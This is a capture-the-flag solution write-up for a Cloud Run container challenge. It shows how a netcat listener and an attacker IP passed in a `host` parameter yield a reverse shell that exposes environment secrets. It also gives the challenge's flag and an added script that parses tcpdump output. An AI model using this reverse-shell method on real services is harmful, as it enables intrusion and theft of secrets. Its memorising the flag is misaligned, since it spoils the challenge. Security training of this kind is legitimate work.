# Running in the Clouds - Solution

## Introduction

William Swordsworth, the modern-day container hacker/poet, wants you to compromise a container that he has set up containing a secret. He promises lots of head-breaking, out-of-the-box thinking, packet inspection and swearing.

## Starting point

1. The container has a public endpoint - `https://ctfcloudrun-sz2ttebtva-uc.a.run.app`.

## Your task

1. Read the flag in the env of the container.

## Walkthrough

1. From the poem, identify the variable name to be passed to the web application. Trying some combinations reveals that the parameter is `host`.
2. Open all ports on the Security Group for the attacker machine.
3. Since we don't know what port the reverse shell will connect back to, we need to run `tcpdump` and see which port receives a TCP `RST` packet. On the attacker machine, in a new terminal, run the following `tcpdump` command:

```
tcpdump -ni eth0 -s 1500 port not 22 and port not 53 and not port 443 and not arp
```

4. While `tcpdump` is running, access the Cloud Run web app and note the port number that Cloud Run is trying to connect to.
5. Run a `netcat` listener on port 6945 - `nc -nlvp 6945`.
6. Make the web request with the public URL of the Cloud Run app and pass the IP of the attacker machine via a GET parameter called `host`.

```
Example: https://ctfcloudrun-sz2ttebtva-uc.a.run.app/?host=<attacker-ip>
```

7. From the reverse shell, dump the environment variables, which contain the flag.
8. The flag is `POET_INSIDE_HACKER_OUTSIDE`.
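
The packet inspection in steps 3 and 4 can be done mechanically. The following is an added example, not part of the original solution: it reads `tcpdump -n` text output and reports which local ports received a TCP SYN and answered with a RST, meaning nothing was listening there. The function name, the sample capture lines and the IP addresses are constructed for illustration.

```python
import re
from collections import Counter

# Shape of a tcpdump -n TCP line:
# "<time> IP <src>.<sport> > <dst>.<dport>: Flags [<flags>], ..."
LINE = re.compile(
    r"IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]+)\]"
)

def refused_ports(lines, local_ip):
    """Count, per local port, inbound SYNs that this host answered with a RST."""
    pending = set()      # (remote_ip, remote_port, local_port) with an unanswered SYN
    refused = Counter()
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue     # not an IPv4 TCP line
        flags = m["flags"]
        if m["dst"] == local_ip and flags == "S":
            # Pure SYN arriving at us: someone is opening a connection.
            pending.add((m["src"], m["sport"], m["dport"]))
        elif m["src"] == local_ip and "R" in flags:
            # RST leaving us: only count it if it answers a SYN we saw.
            key = (m["dst"], m["dport"], m["sport"])
            if key in pending:
                pending.discard(key)
                refused[int(m["sport"])] += 1
    return refused

# Constructed sample capture (documentation IP ranges, not real traffic).
SAMPLE = """\
12:00:01.000001 IP 203.0.113.7.40112 > 10.0.0.4.6945: Flags [S], seq 1000, win 65535, length 0
12:00:01.000050 IP 10.0.0.4.6945 > 203.0.113.7.40112: Flags [R.], seq 0, ack 1001, win 0, length 0
12:00:02.000001 IP 203.0.113.7.40113 > 10.0.0.4.6945: Flags [S], seq 2000, win 65535, length 0
12:00:02.000050 IP 10.0.0.4.6945 > 203.0.113.7.40113: Flags [R.], seq 0, ack 2001, win 0, length 0
12:00:03.000001 IP 198.51.100.9.51000 > 10.0.0.4.8080: Flags [S], seq 3000, win 65535, length 0
12:00:03.000050 IP 10.0.0.4.8080 > 198.51.100.9.51000: Flags [S.], seq 9000, ack 3001, win 65160, length 0
12:00:04.000001 IP 10.0.0.4.33000 > 198.51.100.9.80: Flags [R], seq 5, win 0, length 0
""".splitlines()

if __name__ == "__main__":
    for port, count in refused_ports(SAMPLE, "10.0.0.4").most_common():
        print(f"port {port}: {count} refused connection attempt(s)")
```

The accepted connection on port 8080 and the unrelated outbound RST are ignored; only port 6945 is reported.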

